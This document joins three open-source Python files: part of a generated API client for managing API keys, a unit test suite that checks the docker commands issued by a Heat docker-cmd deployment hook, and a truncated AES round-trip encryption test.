def a_pi_key_get_with_http_info(self, **kwargs): # noqa: E501
"""Get your API Keys. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_get_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param bool reverse: If true, will sort results newest first.
:return: list[APIKey]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['reverse'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method a_pi_key_get" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'reverse' in params:
query_params.append(('reverse', params['reverse'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/apiKey', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[APIKey]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def a_pi_key_new(self, **kwargs): # noqa: E501
"""Create a new API Key. # noqa: E501
API Keys can only be created via the frontend. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_new(async=True)
>>> result = thread.get()
:param async bool
:param str name: Key name. This name is for reference only.
:param str cidr: CIDR block to restrict this key to. To restrict to a single address, append \"/32\", e.g. 207.39.29.22/32. Leave blank or set to 0.0.0.0/0 to allow all IPs. Only one block may be set. <a href=\"http://software77.net/cidr-101.html\">More on CIDR blocks</a>
:param str permissions: Key Permissions. All keys can read margin and position data. Additional permissions must be added. Available: [\"order\", \"orderCancel\", \"withdraw\"].
:param bool enabled: Set to true to enable this key on creation. Otherwise, it must be explicitly enabled via /apiKey/enable.
:param str token: OTP Token (YubiKey, Google Authenticator)
:return: APIKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.a_pi_key_new_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.a_pi_key_new_with_http_info(**kwargs) # noqa: E501
return data
def a_pi_key_new_with_http_info(self, **kwargs): # noqa: E501
"""Create a new API Key. # noqa: E501
API Keys can only be created via the frontend. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_new_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str name: Key name. This name is for reference only.
:param str cidr: CIDR block to restrict this key to. To restrict to a single address, append \"/32\", e.g. 207.39.29.22/32. Leave blank or set to 0.0.0.0/0 to allow all IPs. Only one block may be set. <a href=\"http://software77.net/cidr-101.html\">More on CIDR blocks</a>
:param str permissions: Key Permissions. All keys can read margin and position data. Additional permissions must be added. Available: [\"order\", \"orderCancel\", \"withdraw\"].
:param bool enabled: Set to true to enable this key on creation. Otherwise, it must be explicitly enabled via /apiKey/enable.
:param str token: OTP Token (YubiKey, Google Authenticator)
:return: APIKey
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'cidr', 'permissions', 'enabled', 'token'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method a_pi_key_new" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'name' in params:
form_params.append(('name', params['name'])) # noqa: E501
if 'cidr' in params:
form_params.append(('cidr', params['cidr'])) # noqa: E501
if 'permissions' in params:
form_params.append(('permissions', params['permissions'])) # noqa: E501
if 'enabled' in params:
form_params.append(('enabled', params['enabled'])) # noqa: E501
if 'token' in params:
form_params.append(('token', params['token'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/apiKey', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='APIKey', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def a_pi_key_remove(self, api_key_id, **kwargs): # noqa: E501
"""Remove an API Key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_remove(api_key_id, async=True)
>>> result = thread.get()
:param async bool
:param str api_key_id: API Key ID (public component). (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.a_pi_key_remove_with_http_info(api_key_id, **kwargs) # noqa: E501
else:
(data) = self.a_pi_key_remove_with_http_info(api_key_id, **kwargs) # noqa: E501
return data
def a_pi_key_remove_with_http_info(self, api_key_id, **kwargs): # noqa: E501
"""Remove an API Key. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.a_pi_key_remove_with_http_info(api_key_id, async=True)
>>> result = thread.get()
:param async bool
:param str api_key_id: API Key ID (public component). (required)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['api_key_id'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method a_pi_key_remove" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'api_key_id' is set
if ('api_key_id' not in params or
params['api_key_id'] is None):
raise ValueError("Missing the required parameter `api_key_id` when calling `a_pi_key_remove`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'api_key_id' in params:
form_params.append(('apiKeyID', params['api_key_id'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/apiKey', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
--- record: tests/test_hook_docker_cmd.py | mail2nsrajesh/heat-agents @ cb2690a5 | Apache-2.0 | 30,103 bytes ---
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import json
import os
import tempfile
import fixtures
from tests import common
class HookDockerCmdTest(common.RunScriptTest):
data = {
"name": "abcdef001",
"group": "docker-cmd",
"id": "abc123",
"inputs": [{
"name": "deploy_stack_id",
"value": "the_stack",
}, {
"name": "deploy_resource_name",
"value": "the_deployment",
}],
"config": {
"db": {
"name": "x",
"image": "xxx",
"privileged": False,
"environment": ["foo=bar"],
"env_file": "env.file",
"start_order": 0
},
"web-ls": {
"action": "exec",
"start_order": 2,
"command": ["web", "/bin/ls", "-l"]
},
"web": {
"name": "y",
"start_order": 1,
"image": "yyy",
"net": "host",
"restart": "always",
"privileged": True,
"user": "root",
"command": "/bin/webserver start",
"volumes": [
"/run:/run",
"db:/var/lib/db"
],
"environment": [
"KOLLA_CONFIG_STRATEGY=COPY_ALWAYS",
"FOO=BAR"
],
"env_file": [
"foo.env",
"bar.conf"
]
}
}
}
data_exit_code = {
"name": "abcdef001",
"group": "docker-cmd",
"id": "abc123",
"config": {
"web-ls": {
"action": "exec",
"command": ["web", "/bin/ls", "-l"],
"exit_codes": [0, 1]
}
}
}
def setUp(self):
super(HookDockerCmdTest, self).setUp()
self.hook_path = self.relative_path(
__file__,
'..',
'heat-config-docker-cmd/install.d/hook-docker-cmd.py')
self.cleanup_path = self.relative_path(
__file__,
'..',
'heat-config-docker-cmd/',
'os-refresh-config/configure.d/50-heat-config-docker-cmd')
self.fake_tool_path = self.relative_path(
__file__,
'config-tool-fake.py')
self.working_dir = self.useFixture(fixtures.TempDir())
self.outputs_dir = self.useFixture(fixtures.TempDir())
self.test_state_path = self.outputs_dir.join('test_state.json')
self.env = os.environ.copy()
self.env.update({
'HEAT_DOCKER_CMD': self.fake_tool_path,
'TEST_STATE_PATH': self.test_state_path,
})
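    # The hook under test shells out to whatever HEAT_DOCKER_CMD points at;
    # substituting config-tool-fake.py lets each test feed canned responses
    # through TEST_RESPONSE and replay the recorded invocations from
    # TEST_STATE_PATH.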
def assert_args_and_labels(self, expected_args, expected_labels, observed):
'''Assert the labels arguments separately to other arguments.
Tests that each expected_labels label exists, and remaining
expected arguments match exactly.
This allows paunch to add new label arguments without breaking these
tests.
'''
args = []
labels = []
j = 0
while j < len(observed):
if observed[j] == '--label':
j += 1
labels.append(observed[j])
else:
args.append(observed[j])
j += 1
self.assertEqual(expected_args, args)
for label in expected_labels:
self.assertIn(label, labels)
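        # For example, observed == ['run', '--label', 'a=1', '--name', 'web']
        # yields args == ['run', '--name', 'web'] and labels == ['a=1'].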
def test_hook(self):
self.env.update({
'TEST_RESPONSE': json.dumps([
# ps for delete missing
{},
# ps for renames
{},
# ps for currently running containers
{},
# inspect for db unique container name
{},
# docker run db
{'stderr': 'Creating db...'},
# inspect for web unique container name
{},
# docker run web
{'stderr': 'Creating web...'},
# name lookup for exec web
{'stdout': 'web'},
# docker exec web
{'stderr': 'one.txt\ntwo.txt\nthree.txt'},
])
})
returncode, stdout, stderr = self.run_cmd(
[self.hook_path], self.env, json.dumps(self.data))
self.assertEqual(0, returncode, stderr)
self.assertEqual({
'deploy_stdout': '',
'deploy_stderr': 'Creating db...\n'
'Creating web...\n'
'one.txt\ntwo.txt\nthree.txt',
'deploy_status_code': 0
}, json.loads(stdout))
state = list(self.json_from_files(self.test_state_path, 9))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[1]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[2]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
'db'
], state[3]['args'])
self.assert_args_and_labels([
self.fake_tool_path,
'run',
'--name',
'db',
'--detach=true',
'--env-file=env.file',
'--env=foo=bar',
'--privileged=false',
            'xxx'
], [
'deploy_stack_id=the_stack',
'deploy_resource_name=the_deployment',
'config_id=abc123',
'container_name=db',
'managed_by=docker-cmd',
], state[4]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
'web',
], state[5]['args'])
self.assert_args_and_labels([
self.fake_tool_path,
'run',
'--name',
'web',
'--detach=true',
'--env-file=foo.env',
'--env-file=bar.conf',
'--env=KOLLA_CONFIG_STRATEGY=COPY_ALWAYS',
'--env=FOO=BAR',
'--net=host',
'--privileged=true',
'--restart=always',
'--user=root',
'--volume=/run:/run',
'--volume=db:/var/lib/db',
'yyy',
'/bin/webserver',
'start'
], [
'deploy_stack_id=the_stack',
'deploy_resource_name=the_deployment',
'config_id=abc123',
'container_name=web',
'managed_by=docker-cmd',
], state[6]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=container_name=web',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}}',
], state[7]['args'])
self.assertEqual([
self.fake_tool_path,
'exec',
'web',
'/bin/ls',
'-l'
], state[8]['args'])
def test_hook_exit_codes(self):
self.env.update({
'TEST_RESPONSE': json.dumps([
# ps for delete missing
{},
# ps for renames
{},
# ps for currently running containers
{},
{'stdout': 'web'},
{
'stdout': '',
'stderr': 'Warning: custom exit code',
'returncode': 1
}
])
})
returncode, stdout, stderr = self.run_cmd(
[self.hook_path], self.env, json.dumps(self.data_exit_code))
self.assertEqual({
'deploy_stdout': '',
'deploy_stderr': 'Warning: custom exit code',
'deploy_status_code': 0
}, json.loads(stdout))
state = list(self.json_from_files(self.test_state_path, 5))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[1]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[2]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=container_name=web',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}}',
], state[3]['args'])
self.assertEqual([
self.fake_tool_path,
'exec',
'web',
'/bin/ls',
'-l'
], state[4]['args'])
def test_hook_failed(self):
self.env.update({
'TEST_RESPONSE': json.dumps([
# ps for delete missing
{},
# ps for renames
{},
# ps for currently running containers
{},
# inspect for db unique container name
{},
# docker run db
{'stderr': 'Creating db...'},
# inspect for web unique container name
{},
# docker run web
{'stderr': 'Creating web...'},
# name lookup for exec web
{'stdout': 'web'},
# docker exec web fails
{
'stdout': '',
'stderr': 'No such file or directory',
'returncode': 2
}
])
})
returncode, stdout, stderr = self.run_cmd(
[self.hook_path], self.env, json.dumps(self.data))
self.assertEqual({
'deploy_stdout': '',
'deploy_stderr': 'Creating db...\n'
'Creating web...\n'
'No such file or directory',
'deploy_status_code': 2
}, json.loads(stdout))
state = list(self.json_from_files(self.test_state_path, 9))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[1]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[2]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
'db'
], state[3]['args'])
self.assert_args_and_labels([
self.fake_tool_path,
'run',
'--name',
'db',
'--detach=true',
'--env-file=env.file',
'--env=foo=bar',
'--privileged=false',
            'xxx'
], [
'deploy_stack_id=the_stack',
'deploy_resource_name=the_deployment',
'config_id=abc123',
'container_name=db',
'managed_by=docker-cmd',
], state[4]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
'web',
], state[5]['args'])
self.assert_args_and_labels([
self.fake_tool_path,
'run',
'--name',
'web',
'--detach=true',
'--env-file=foo.env',
'--env-file=bar.conf',
'--env=KOLLA_CONFIG_STRATEGY=COPY_ALWAYS',
'--env=FOO=BAR',
'--net=host',
'--privileged=true',
'--restart=always',
'--user=root',
'--volume=/run:/run',
'--volume=db:/var/lib/db',
'yyy',
'/bin/webserver',
'start'
], [
'deploy_stack_id=the_stack',
'deploy_resource_name=the_deployment',
'config_id=abc123',
'container_name=web',
'managed_by=docker-cmd',
], state[6]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=container_name=web',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}}',
], state[7]['args'])
self.assertEqual([
self.fake_tool_path,
'exec',
'web',
'/bin/ls',
'-l'
], state[8]['args'])
def test_hook_unique_names(self):
self.env.update({
'TEST_RESPONSE': json.dumps([
# ps for delete missing in this config id
{},
# ps for renames
{'stdout': 'web web\ndb db\n'},
# ps for currently running containers in this config id
{},
# inspect for db unique container name
{'stdout': 'exists'},
{
'stderr': 'Error: No such container: db-blah',
'returncode': 1
},
# docker run db
{'stderr': 'Creating db...'},
# # inspect for web unique container name
{'stdout': 'exists'},
{
'stderr': 'Error: No such container: web-blah',
'returncode': 1
},
# # docker run web
{'stderr': 'Creating web...'},
# name lookup for exec web
{'stdout': 'web-asdf1234'},
# docker exec web-asdf1234
{'stderr': 'one.txt\ntwo.txt\nthree.txt'},
])
})
returncode, stdout, stderr = self.run_cmd(
[self.hook_path], self.env, json.dumps(self.data))
self.assertEqual(0, returncode, stderr)
self.assertEqual({
'deploy_stdout': '',
'deploy_stderr': 'Creating db...\n'
'Creating web...\n'
'one.txt\ntwo.txt\nthree.txt',
'deploy_status_code': 0
}, json.loads(stdout))
state = list(self.json_from_files(self.test_state_path, 11))
db_container_name = state[4]['args'][4]
web_container_name = state[7]['args'][4]
self.assertRegex(db_container_name, 'db-[0-9a-z]{8}')
self.assertRegex(web_container_name, 'web-[0-9a-z]{8}')
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[1]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[2]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
'db'
], state[3]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
db_container_name,
], state[4]['args'])
self.assert_args_and_labels([
self.fake_tool_path,
'run',
'--name',
db_container_name,
'--detach=true',
'--env-file=env.file',
'--env=foo=bar',
'--privileged=false',
'xxx'
], [
'deploy_stack_id=the_stack',
'deploy_resource_name=the_deployment',
'config_id=abc123',
'container_name=db',
'managed_by=docker-cmd',
], state[5]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
'web',
], state[6]['args'])
self.assertEqual([
self.fake_tool_path,
'inspect',
'--format',
'exists',
web_container_name,
], state[7]['args'])
self.assert_args_and_labels([
self.fake_tool_path,
'run',
'--name',
web_container_name,
'--detach=true',
'--env-file=foo.env',
'--env-file=bar.conf',
'--env=KOLLA_CONFIG_STRATEGY=COPY_ALWAYS',
'--env=FOO=BAR',
'--net=host',
'--privileged=true',
'--restart=always',
'--user=root',
'--volume=/run:/run',
'--volume=db:/var/lib/db',
'yyy',
'/bin/webserver',
'start'
], [
'deploy_stack_id=the_stack',
'deploy_resource_name=the_deployment',
'config_id=abc123',
'container_name=web',
'managed_by=docker-cmd',
], state[8]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=container_name=web',
'--filter',
'label=config_id=abc123',
'--format',
'{{.Names}}',
], state[9]['args'])
self.assertEqual([
self.fake_tool_path,
'exec',
'web-asdf1234',
'/bin/ls',
'-l'
], state[10]['args'])
def test_cleanup_deleted(self):
self.env.update({
'TEST_RESPONSE': json.dumps([{
# first run, no running containers
'stdout': '\n'
}, {
# list name and container_name label for all containers
'stdout': '\n'
}])
})
conf_dir = self.useFixture(fixtures.TempDir()).join()
with tempfile.NamedTemporaryFile(dir=conf_dir, delete=False) as f:
f.write(json.dumps([self.data]))
f.flush()
self.env['HEAT_SHELL_CONFIG'] = f.name
returncode, stdout, stderr = self.run_cmd(
[self.cleanup_path], self.env)
# on the first run, no docker rm calls made
state = list(self.json_from_files(self.test_state_path, 2))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Label "config_id"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[1]['args'])
self.env.update({
'TEST_RESPONSE': json.dumps([{
# list config_id labels, 3 containers same config
'stdout': 'abc123\nabc123\nabc123\n'
}, {
# list containers with config_id
'stdout': '111\n222\n333\n'
}, {
'stdout': '111 deleted'
}, {
'stdout': '222 deleted'
}, {
'stdout': '333 deleted'
}, {
# list name and container_name label for all containers
'stdout': '\n'
}])
})
# run again with empty config data
with tempfile.NamedTemporaryFile(dir=conf_dir, delete=False) as f:
f.write(json.dumps([]))
f.flush()
self.env['HEAT_SHELL_CONFIG'] = f.name
returncode, stdout, stderr = self.run_cmd(
[self.cleanup_path], self.env)
# on the second run, abc123 is deleted,
# docker rm is run on all containers
state = list(self.json_from_files(self.test_state_path, 6))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Label "config_id"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-q',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123'
], state[1]['args'])
self.assertEqual([
self.fake_tool_path,
'rm',
'-f',
'111',
], state[2]['args'])
self.assertEqual([
self.fake_tool_path,
'rm',
'-f',
'222',
], state[3]['args'])
self.assertEqual([
self.fake_tool_path,
'rm',
'-f',
'333',
], state[4]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[5]['args'])
def test_cleanup_changed(self):
self.env.update({
'TEST_RESPONSE': json.dumps([{
# list config_id labels, 3 containers same config
'stdout': 'abc123\nabc123\nabc123\n'
}, {
# list name and container_name label for all containers
'stdout': '111 111\n'
'222 222\n'
'333\n'
}])
})
conf_dir = self.useFixture(fixtures.TempDir()).join()
with tempfile.NamedTemporaryFile(dir=conf_dir, delete=False) as f:
f.write(json.dumps([self.data]))
f.flush()
self.env['HEAT_SHELL_CONFIG'] = f.name
returncode, stdout, stderr = self.run_cmd(
[self.cleanup_path], self.env)
# on the first run, no docker rm calls made
state = list(self.json_from_files(self.test_state_path, 2))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Label "config_id"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[1]['args'])
# run again with changed config data
self.env.update({
'TEST_RESPONSE': json.dumps([{
# list config_id labels, 3 containers same config
'stdout': 'abc123\nabc123\nabc123\n'
}, {
# list containers with config_id
'stdout': '111\n222\n333\n'
}, {
'stdout': '111 deleted'
}, {
'stdout': '222 deleted'
}, {
'stdout': '333 deleted'
}, {
# list name and container_name label for all containers
'stdout': 'abc123 abc123\n'
}])
})
new_data = copy.deepcopy(self.data)
new_data['config']['web']['image'] = 'yyy'
new_data['id'] = 'def456'
with tempfile.NamedTemporaryFile(dir=conf_dir, delete=False) as f:
f.write(json.dumps([new_data]))
f.flush()
self.env['HEAT_SHELL_CONFIG'] = f.name
returncode, stdout, stderr = self.run_cmd(
[self.cleanup_path], self.env)
# on the second run, abc123 is deleted,
# docker rm is run on all containers
state = list(self.json_from_files(self.test_state_path, 6))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Label "config_id"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-q',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--filter',
'label=config_id=abc123'
], state[1]['args'])
self.assertEqual([
self.fake_tool_path,
'rm',
'-f',
'111',
], state[2]['args'])
self.assertEqual([
self.fake_tool_path,
'rm',
'-f',
'222',
], state[3]['args'])
self.assertEqual([
self.fake_tool_path,
'rm',
'-f',
'333',
], state[4]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[5]['args'])
def test_cleanup_rename(self):
self.env.update({
'TEST_RESPONSE': json.dumps([{
# list config_id labels, 3 containers same config
'stdout': 'abc123\nabc123\nabc123\n'
}, {
# list name and container_name label for all containers
'stdout': '111 111-s84nf83h\n'
'222 222\n'
'333 333-3nd83nfi\n'
}])
})
conf_dir = self.useFixture(fixtures.TempDir()).join()
with tempfile.NamedTemporaryFile(dir=conf_dir, delete=False) as f:
f.write(json.dumps([self.data]))
f.flush()
self.env['HEAT_SHELL_CONFIG'] = f.name
returncode, stdout, stderr = self.run_cmd(
[self.cleanup_path], self.env)
# on the first run, no docker rm calls made
state = list(self.json_from_files(self.test_state_path, 4))
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Label "config_id"}}'
], state[0]['args'])
self.assertEqual([
self.fake_tool_path,
'ps',
'-a',
'--filter',
'label=managed_by=docker-cmd',
'--format',
'{{.Names}} {{.Label "container_name"}}'
], state[1]['args'])
self.assertEqual([
self.fake_tool_path,
'rename',
'111',
'111-s84nf83h'
], state[2]['args'])
self.assertEqual([
self.fake_tool_path,
'rename',
'333',
'333-3nd83nfi'
], state[3]['args'])
--- record: tests/src/gretel_client/unit/transformers/fpe/test_crypto_aes.py | franccesco/gretel-python-client @ fd20dee0 | Apache-2.0 | 3,159 bytes ---
from gretel_client.transformers.fpe.crypto_aes import AESCipher, Mode
def test_crypto_aes():
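    # Round-trips two 32-byte buffers through AESCipher in CBC_FAST, ECB and
    # CBC modes, checking that decrypt(encrypt(x)) == x and that two ciphers
    # built with the same key produce identical ciphertext.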
test_object = memoryview(b"I am a not so fancy test object!")
test_object2 = memoryview(b"I am another fancirt tst object!")
# test_object = memoryview(b"I am a not so fa")
test_cipher = memoryview(bytearray(len(test_object)))
test_decipher = memoryview(bytearray(len(test_object)))
test_cipher2 = memoryview(bytearray(len(test_object)))
test_decipher2 = memoryview(bytearray(len(test_object)))
aes_cipher = AESCipher(
"12345678901234567890123456789012".encode(), mode=Mode.CBC_FAST
)
aes_cipher2 = AESCipher(
"12345678901234567890123456789012".encode(), mode=Mode.CBC_FAST
)
aes_cipher.encrypt_blocks(test_cipher, test_object)
aes_cipher.reset_cipher()
aes_cipher.encrypt_blocks(test_cipher2, test_object2)
aes_cipher.reset_cipher()
aes_cipher.decrypt_blocks(test_decipher2, test_cipher2)
aes_cipher.reset_cipher()
aes_cipher.decrypt_blocks(test_decipher, test_cipher)
assert test_decipher.tobytes() == test_object.tobytes()
aes_cipher2.encrypt_blocks(test_cipher2, test_object)
aes_cipher2.decrypt_blocks(test_decipher2, test_cipher2)
assert test_decipher2.tobytes() == test_object.tobytes()
assert test_cipher2.tobytes() == test_cipher.tobytes()
aes_cipher.reset_cipher()
aes_cipher.encrypt(test_cipher, test_object)
aes_cipher.decrypt(test_decipher, test_cipher)
assert test_decipher.tobytes() == test_object.tobytes()
aes_cipher = AESCipher("12345678901234567890123456789012".encode(), mode=Mode.ECB)
aes_cipher2 = AESCipher("12345678901234567890123456789012".encode(), mode=Mode.ECB)
aes_cipher.encrypt_blocks(test_cipher, test_object)
aes_cipher.decrypt_blocks(test_decipher, test_cipher)
assert test_decipher.tobytes() == test_object.tobytes()
aes_cipher2.encrypt_blocks(test_cipher2, test_object)
aes_cipher2.decrypt_blocks(test_decipher2, test_cipher2)
assert test_decipher2.tobytes() == test_object.tobytes()
assert test_cipher2.tobytes() == test_cipher.tobytes()
aes_cipher.encrypt(test_cipher, test_object)
aes_cipher.decrypt(test_decipher, test_cipher)
assert test_decipher.tobytes() == test_object.tobytes()
aes_cipher = AESCipher("12345678901234567890123456789012".encode(), mode=Mode.CBC)
aes_cipher2 = AESCipher("12345678901234567890123456789012".encode(), mode=Mode.CBC)
aes_cipher.encrypt_blocks(test_cipher, test_object)
